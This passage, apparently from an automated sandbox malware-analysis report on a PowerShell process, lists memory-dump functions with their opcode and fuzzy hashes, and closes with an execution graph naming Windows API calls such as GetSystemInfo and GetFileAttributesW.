                                                                                                                  • Instruction Fuzzy Hash: 6461263060D7884FE769DF3CC454AA9BBE1EF86314B1447BEE089C71E7DE68A9468301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C2776 Relevance: .2, Instructions: 195COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 16463cbe582f5a6484aeda5c3ecb4462319ac0b0333c774eb595c967a7068617
                                                                                                                  • Instruction ID: 8e87b1a02fb1ffac7eed1b1b9f8583f394969a2d129dcbaae23209bbe67ad594
                                                                                                                  • Opcode Fuzzy Hash: 16463cbe582f5a6484aeda5c3ecb4462319ac0b0333c774eb595c967a7068617
                                                                                                                  • Instruction Fuzzy Hash: 6C51A031A19A494FE368EF3C8456369B7D2FF89214F1485BED14EC72E2DE78E9428740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C814D Relevance: .2, Instructions: 192COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6a538e06bef65bdc8a9422f31da7dc0bffeda983c5acf3cbb4a0f68405d22e9a
                                                                                                                  • Instruction ID: 98dde4e7a5fc5e2f220ca5eafeb95114dabc8242d1379659dda93a4f18c59448
                                                                                                                  • Opcode Fuzzy Hash: 6a538e06bef65bdc8a9422f31da7dc0bffeda983c5acf3cbb4a0f68405d22e9a
                                                                                                                  • Instruction Fuzzy Hash: B5512E2060DA895FE765DF3CC494A767FE1FF8A21471447BAE089C75E6CE78E9068300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CB1FD Relevance: .2, Instructions: 190COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9955786e7a32f741811803fda8721a2692dc860f64085e07816fa86e5f3da83d
                                                                                                                  • Instruction ID: 88144bf2b793b6803ae7e1f4f585f68b7547f1dbcc5df8c3284175b4486f6583
                                                                                                                  • Opcode Fuzzy Hash: 9955786e7a32f741811803fda8721a2692dc860f64085e07816fa86e5f3da83d
                                                                                                                  • Instruction Fuzzy Hash: 5F513D2060D7894FE765DF3CC48067ABFD1FF8A21471487BAE099C75E6DE68E9468301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CA5DD Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ddeb74371fc22e080fb25dbf21083ab2fa0589eac0a3067a68c1c05cd51c9b99
                                                                                                                  • Instruction ID: 54c79cf4278492cfbd5b61d4dae538320b0969bfe23556c9681b066793c38e7d
                                                                                                                  • Opcode Fuzzy Hash: ddeb74371fc22e080fb25dbf21083ab2fa0589eac0a3067a68c1c05cd51c9b99
                                                                                                                  • Instruction Fuzzy Hash: 2751D321A186494FE3A8DF3CC444736B7E1FBC9314B2187BAD049C76E6DE78E9068741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C6D2D Relevance: .2, Instructions: 184COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 866fcca678bb574b3d1b356867f43d96f111f57962706b1f3db16990fa08440a
                                                                                                                  • Instruction ID: a5488b175a7f8c713cc231ec91de099ec47029a0fe08da3cd4ba8121b6a8a13a
                                                                                                                  • Opcode Fuzzy Hash: 866fcca678bb574b3d1b356867f43d96f111f57962706b1f3db16990fa08440a
                                                                                                                  • Instruction Fuzzy Hash: DE51393071DA894FE364DF3CC8406B6BBD1EF8621470487BAE09AC71E6DE78E5469300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C6B0D Relevance: .2, Instructions: 183COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 64f1892a59eeeee067fbb5cb857c3ada4375a30e9e97d0cee0e8c2fa49047aac
                                                                                                                  • Instruction ID: cddaa23036b206ee9a9d05381deaadd75617dc0423617281e7deba7d6adc2bcc
                                                                                                                  • Opcode Fuzzy Hash: 64f1892a59eeeee067fbb5cb857c3ada4375a30e9e97d0cee0e8c2fa49047aac
                                                                                                                  • Instruction Fuzzy Hash: A951383061D6894FE768DF3C88516B6BBD1FF86314B0487BAE09AC71E6DE78E5465300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CC58D Relevance: .2, Instructions: 181COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 525d58faf417ac9af62205efeb934b69aed02828ceebf792c1d4d0f3b127a6ed
                                                                                                                  • Instruction ID: 0ae755196d8d26d7191ff4c28fb949fe7d69b3db16b642c04cb07597287e8b36
                                                                                                                  • Opcode Fuzzy Hash: 525d58faf417ac9af62205efeb934b69aed02828ceebf792c1d4d0f3b127a6ed
                                                                                                                  • Instruction Fuzzy Hash: A0514A3060D6840FE764DF3C98547A6BBD1FF86214B5887BED08AC75E6DE78E9068340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C726D Relevance: .2, Instructions: 178COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3fb9f02c1a7d33dde4f207f69666e55bb8ea0ad2e109c4b9c6b5ff05a2b53840
                                                                                                                  • Instruction ID: 7836732695fff06dc9e5257a7205e9e3758990632357f33415a26bfb19c35151
                                                                                                                  • Opcode Fuzzy Hash: 3fb9f02c1a7d33dde4f207f69666e55bb8ea0ad2e109c4b9c6b5ff05a2b53840
                                                                                                                  • Instruction Fuzzy Hash: 6F512C3070D6894FE768DF3CC450AA67BE1FF8A314B1486BAE44AC71E6DE78E5068340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C68ED Relevance: .2, Instructions: 178COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 856cb8ac499e2cb92f29ad8f0a35371b27ef24ef303e5b13a83f3253f0b4122a
                                                                                                                  • Instruction ID: b30d2acd05d6797a512cdfc0fc1ea5b3e19f6d902f08907fdd702be91569812d
                                                                                                                  • Opcode Fuzzy Hash: 856cb8ac499e2cb92f29ad8f0a35371b27ef24ef303e5b13a83f3253f0b4122a
                                                                                                                  • Instruction Fuzzy Hash: 0751283061D6894FE768DF3CC8516BABBD1FF86214B0587BAD09AC71E6DE78E5464300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CBB65 Relevance: .2, Instructions: 174COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5cff250774a8c585eeed67a2bee422bf09f1d0e244db0628136d6f073a9e5c81
                                                                                                                  • Instruction ID: 9352b1157c4afc114d1c9ee4bb1ac21cadd553c6583cb7f98e9ae2705d7bd08b
                                                                                                                  • Opcode Fuzzy Hash: 5cff250774a8c585eeed67a2bee422bf09f1d0e244db0628136d6f073a9e5c81
                                                                                                                  • Instruction Fuzzy Hash: BC51D62060C6884FE769DE3C84517A97BD1FF8A304F1486BEE08ACB5E6DE78A9465301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CCC3B Relevance: .2, Instructions: 166COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b3270ab0bebafd6e1a7bc2514299976d169dab966d81a52b0bc2538798b63777
                                                                                                                  • Instruction ID: 7f85bf888ff5862c9fecbe5510ec39442d258e44b724f588c59f3b51fd8edaf5
                                                                                                                  • Opcode Fuzzy Hash: b3270ab0bebafd6e1a7bc2514299976d169dab966d81a52b0bc2538798b63777
                                                                                                                  • Instruction Fuzzy Hash: 5E51F73071C6894FD769DF3C845166A7BD2EF8A204B55C6BEE08AC71E6DE78E8065340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3CCD90 Relevance: .2, Instructions: 166COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 37b99a6f1c4497e1b5148c141bc490cbf67dfd5d1ac27918ebd3017095d7153b
                                                                                                                  • Instruction ID: c61b8ddd1c3f6ee2d810f3800bd46c7535b82a7744a2a49f328438ed2b1afc35
                                                                                                                  • Opcode Fuzzy Hash: 37b99a6f1c4497e1b5148c141bc490cbf67dfd5d1ac27918ebd3017095d7153b
                                                                                                                  • Instruction Fuzzy Hash: 7A51DC2060D6894FD7A5DF3CC490AB67FD1FF8A214B5487BAE089C75E6CA68E9064341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C63A4 Relevance: .2, Instructions: 164COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d9a281f48276164d84a0e576f0140c7325460000f6d34259f685f88ef8ba1790
                                                                                                                  • Instruction ID: c67c8d45de2c05e1cdf6df71ac442a4416bf813f6dbf1f920e7f8dfba6f7a4e4
                                                                                                                  • Opcode Fuzzy Hash: d9a281f48276164d84a0e576f0140c7325460000f6d34259f685f88ef8ba1790
                                                                                                                  • Instruction Fuzzy Hash: 0C510C2060D6894FE3A5DF3CC4906767FD1FF8A214B5487BAE089CB5E6CE78E9468301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C559D Relevance: .2, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 610120d9bc977195b933b1837d70d657f92fb843339b39c16ba9260e6dc642e1
                                                                                                                  • Instruction ID: f5757a7a526a5371f575abb945f2090cbdaa68fe28bc7584949d80693fda26ae
                                                                                                                  • Opcode Fuzzy Hash: 610120d9bc977195b933b1837d70d657f92fb843339b39c16ba9260e6dc642e1
                                                                                                                  • Instruction Fuzzy Hash: 1541293061D6854FE364DF3CD8456A6B7D1FF86314B0587BAE09AC71E6DE68E5064340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C594D Relevance: .2, Instructions: 152COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2304ce67ea087cda81ffd881214ffc585ec862fb31c51c26edd3487671f0f343
                                                                                                                  • Instruction ID: 257a4e01ca5e7029eef4be0cb4b6a4dc121200ff47e807584e997be879bbf46b
                                                                                                                  • Opcode Fuzzy Hash: 2304ce67ea087cda81ffd881214ffc585ec862fb31c51c26edd3487671f0f343
                                                                                                                  • Instruction Fuzzy Hash: 0D415A3061D6854FE764DF3CD8416B6BBD1FF86214B0587BAD08AC71E6CE68E5068300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C708E Relevance: .1, Instructions: 145COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2e633a35eb0fddb540f52b1b307c73e69625e7554ca10ec831154f45de98a530
                                                                                                                  • Instruction ID: 5e21b47e5da72f2d02cbece94052f7c26630039e206e3154406ba4761b7c39eb
                                                                                                                  • Opcode Fuzzy Hash: 2e633a35eb0fddb540f52b1b307c73e69625e7554ca10ec831154f45de98a530
                                                                                                                  • Instruction Fuzzy Hash: 5E41EE2060D6894FE7A5DF3CC4916767FD1FF8A214B5487BAE089CB5E6CA78E9064301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C47DB Relevance: .1, Instructions: 144COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 297a0c30726607fdd36c9a636b57714bdbda57bd44cf156e9032bc3b6016fdfb
                                                                                                                  • Instruction ID: 51cb493ffb77f5552e1eae63736da49349b8cd76d7681ad2dbf4c1bf91dbfae3
                                                                                                                  • Opcode Fuzzy Hash: 297a0c30726607fdd36c9a636b57714bdbda57bd44cf156e9032bc3b6016fdfb
                                                                                                                  • Instruction Fuzzy Hash: 6F41EA2061D6894FE769DF3CC4517A97BD1FF8A304B5486BEE04ACB5E6DE78E5064300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C78FB Relevance: .1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ae3d92e53c5625aeac2138400ed50687f5fd6357487825c545b685940f864359
                                                                                                                  • Instruction ID: d7c29f6d19fac33f6fae27318fb878723cba417122de6bc60a3537fd5cdf1a1c
                                                                                                                  • Opcode Fuzzy Hash: ae3d92e53c5625aeac2138400ed50687f5fd6357487825c545b685940f864359
                                                                                                                  • Instruction Fuzzy Hash: 5041D93071C6894FE768DF3C845166ABBD2FF8A204B55C6BDD08AC75E6DE78E9065300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C72CB Relevance: .1, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 65b2263ce811cdbc0fd4f908ca817841965c59300d5042791005e685f219d7d5
                                                                                                                  • Instruction ID: 8aa93331310bb7bf7544875d37b1638bfd1fa5057a3f147bd8948353045e59c6
                                                                                                                  • Opcode Fuzzy Hash: 65b2263ce811cdbc0fd4f908ca817841965c59300d5042791005e685f219d7d5
                                                                                                                  • Instruction Fuzzy Hash: D741D431B1CA488FE768DE3C8451676B7E2FBC9304B11C6BAD44ACB6E6DE74B9064340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C628B Relevance: .1, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11206347e032cd24ec1756dfaa409a070771bb3243e4cfca54897938090f87f4
                                                                                                                  • Instruction ID: a38ecc6328318a6c9ab3477555023cb2129704e4ac0123039364843ca8836e0f
                                                                                                                  • Opcode Fuzzy Hash: 11206347e032cd24ec1756dfaa409a070771bb3243e4cfca54897938090f87f4
                                                                                                                  • Instruction Fuzzy Hash: A541092071C6894FE768DF3C845167ABBD2FF8A204B55C6BDE08AC75E6DE78E4469300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C660B Relevance: .1, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 78ea5eba32452cadce6710ae261e49646f720032efe7b3d2076db57919c759cd
                                                                                                                  • Instruction ID: 5d185c1756b492e90e01b93b9cd988de6b441603ad8eabb75792425e15d77b6f
                                                                                                                  • Opcode Fuzzy Hash: 78ea5eba32452cadce6710ae261e49646f720032efe7b3d2076db57919c759cd
                                                                                                                  • Instruction Fuzzy Hash: ED41173071C6894FE768DF3C845167ABBD2EF86214B1586BEE08ACB5E6DE74E4079300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C6FAB Relevance: .1, Instructions: 111COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2cf6a577e025e148e3ccfd7ad61c05db175c18ae60ee0fe44a83d42f34c0362a
                                                                                                                  • Instruction ID: 2320c1d5a81cd86e744edeb00b4c9f7960e7ac3f5e9e71c2d0a560604b0804a5
                                                                                                                  • Opcode Fuzzy Hash: 2cf6a577e025e148e3ccfd7ad61c05db175c18ae60ee0fe44a83d42f34c0362a
                                                                                                                  • Instruction Fuzzy Hash: 7E310A3171C6894FE7A8DF3C84516BAB7D1FF8A214B0586BEE04AC71E6DE78E4065300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3C519B Relevance: .1, Instructions: 108COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 53320d219091a949825102755e9410fe947a38e9240433ab97747612c6f4d301
                                                                                                                  • Instruction ID: eba15ca030741c9a2871e6aca90bcc9c62c392ba5659ca7d921c558d6fd392c3
                                                                                                                  • Opcode Fuzzy Hash: 53320d219091a949825102755e9410fe947a38e9240433ab97747612c6f4d301
                                                                                                                  • Instruction Fuzzy Hash: C031EA3061D6894FE768DF3CC451666B7D1FF86204B1586BDD04AC75E6DE78E9065300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:22
                                                                                                                  Total number of Limit Nodes:2
                                                                                                                  execution_graph 52814 7ff9baf75960 52816 7ff9baf75975 52814->52816 52815 7ff9baf75983 52816->52815 52819 7ff9baf6c548 52816->52819 52818 7ff9baf75a2e 52820 7ff9baf6c54d ComputeAccessTokenFromCodeAuthzLevel 52819->52820 52822 7ff9baf6c66e 52820->52822 52822->52818 52832 7ff9baf6629a 52833 7ff9baf662be IdentifyCodeAuthzLevelW 52832->52833 52834 7ff9baf662b3 52832->52834 52835 7ff9baf6631e 52833->52835 52834->52833 52823 7ff9baf54ada 52824 7ff9baf54ae9 52823->52824 52827 7ff9baf53778 52824->52827 52826 7ff9baf54b4f 52828 7ff9baf5377d 52827->52828 52829 7ff9baf6cc03 GetSystemInfo 52828->52829 52831 7ff9baf6cb70 52828->52831 52830 7ff9baf6cc3e 52829->52830 52830->52826 52831->52826 52836 7ff9baf59bc2 52837 7ff9baf59bef GetFileAttributesW 52836->52837 52839 7ff9baf59c86 52837->52839

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF9BBA11E4E Relevance: 1.8, Instructions: 1750COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e2b544f62506c14de6ad1fd432e02ec72bb52ff2d3b25964e59ca6098972c211
                                                                                                                  • Instruction ID: 034ab665fe9ae605b94b033a82921e7e8a37f76f68f8cebf166d9cc84aa509ad
                                                                                                                  • Opcode Fuzzy Hash: e2b544f62506c14de6ad1fd432e02ec72bb52ff2d3b25964e59ca6098972c211
                                                                                                                  • Instruction Fuzzy Hash: E4B2B121A18E494FE7D4EF2C84667B977D2FFAA310B4540BAD04DC72E2DD18ED468B81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF53778 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem
                                                                                                                  • String ID:
